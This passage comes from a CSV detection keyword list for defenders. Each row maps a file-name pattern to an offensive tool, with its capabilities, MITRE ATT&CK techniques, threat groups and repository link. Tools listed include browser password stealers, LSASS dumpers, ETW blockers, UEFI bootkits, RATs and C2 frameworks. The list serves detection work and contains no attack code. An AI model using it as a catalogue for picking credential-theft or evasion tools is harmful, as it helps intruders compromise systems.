Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","14339" "*\Blackout.vcxproj*",".{0,1000}\\Blackout\.vcxproj.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14340" "*\Blank.Grabber.zip*",".{0,1000}\\Blank\.Grabber\.zip.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","14341" "*\BlankOBF.py*",".{0,1000}\\BlankOBF\.py.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","14342" "*\BlankOBFv2.py*",".{0,1000}\\BlankOBFv2\.py.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","14343" "*\blindeventlog.exe*",".{0,1000}\\blindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) 
mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","14344" "*\blindsight.exe*",".{0,1000}\\blindsight\.exe.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","14345" "*\Blizzard-RAT lite.exe*",".{0,1000}\\Blizzard\-RAT\slite\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14346" "*\block_dll_policy.exe*",".{0,1000}\\block_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","14347" "*\blocketw.bin*",".{0,1000}\\blocketw\.bin.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14348" "*\blocketw.csproj*",".{0,1000}\\blocketw\.csproj.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14349" "*\blocketw.exe*",".{0,1000}\\blocketw\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14350" "*\blocketw.exe*",".{0,1000}\\blocketw\.exe.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14351" "*\blocketw.pdb*",".{0,1000}\\blocketw\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 
- TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14352" "*\blocketw.pdb*",".{0,1000}\\blocketw\.pdb.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14353" "*\blocketw.sln*",".{0,1000}\\blocketw\.sln.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14354" "*\BlockEtw-master*",".{0,1000}BlockEtw\-master.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14355" "*\BlockEtw-master\*",".{0,1000}\\BlockEtw\-master\\.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14356" "*\BloodHound.bin*",".{0,1000}\\BloodHound\.bin.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","14357" "*\BloodHound.exe*",".{0,1000}\\BloodHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","14358" "*\BloodHoundGui\*.exe*",".{0,1000}\\BloodHoundGui\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","14359" "*\bloodhoundsync.py*",".{0,1000}\\bloodhoundsync\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","14360" "*\BloodHound-win32-X64*",".{0,1000}\\BloodHound\-win32\-X64.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","14361" "*\BluePalmRAT.exe*",".{0,1000}\\BluePalmRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14362" "*\bofhound.py*",".{0,1000}\\bofhound\.py.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","14363" "*\BOF-Template\x64\*",".{0,1000}\\BOF\-Template\\x64\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14364" "*\Boot\EfiGuardDxe.efi*",".{0,1000}\\Boot\\EfiGuardDxe\.efi.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to 
disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","14372" "*\bootkit-rs*",".{0,1000}\\bootkit\-rs.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","14373" "*\boxreflect.dll*",".{0,1000}\\boxreflect\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14381" "*\brc.zip*",".{0,1000}\\brc\.zip.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14382" 
"*\BrowserDataGrabber.pdb*",".{0,1000}\\BrowserDataGrabber\.pdb.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","14384" "*\BrowserDataGrabber\*",".{0,1000}\\BrowserDataGrabber\\.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","14385" "*\BrowserEnum.log*",".{0,1000}\\BrowserEnum\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14386" "*\BrowserEnum.log*",".{0,1000}\\BrowserEnum\.log.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","#logfile","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","14387" 
"*\BrowserExfelterator.cs*",".{0,1000}\\BrowserExfelterator\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","14388" "*\BrowserGhost.csproj*",".{0,1000}\\BrowserGhost\.csproj.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","14389" "*\BrowserGhost.exe*",".{0,1000}\\BrowserGhost\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14390" "*\BrowserGhost.pdb*",".{0,1000}\\BrowserGhost\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14391" "*\BrowserGhost.sln*",".{0,1000}\\BrowserGhost\.sln.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","14392" "*\BrowserGhost-master*",".{0,1000}\\BrowserGhost\-master.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","14393" "*\browserhistory.csv*",".{0,1000}\\browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14394" "*\BrowserLogger.ps1*",".{0,1000}\\BrowserLogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - 
TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14395" "*\BrowserSnatch.sln*",".{0,1000}\\BrowserSnatch\.sln.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","14396" "*\BrowserSnatch-master*",".{0,1000}\\BrowserSnatch\-master.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","14397" "*\browsinghistoryview\browsinghistoryview64.exe*",".{0,1000}\\browsinghistoryview\\browsinghistoryview64\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14398" "*\brute force.cna*",".{0,1000}\\brute\sforce\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 
- T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14399" "*\Brute RDP.rar*",".{0,1000}\\Brute\sRDP\.rar.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14400" "*\bruteforce-ftp.py*",".{0,1000}\\bruteforce\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14401" "*\bruteforce-http.py*",".{0,1000}\\bruteforce\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14402" "*\Bruteforcer.*",".{0,1000}\\Bruteforcer\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","14403" "*\bruteforce-rdp.py*",".{0,1000}\\bruteforce\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14404" "*\bruteforce-smb.py*",".{0,1000}\\bruteforce\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14405" "*\bruteforce-ssh.py*",".{0,1000}\\bruteforce\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14406" 
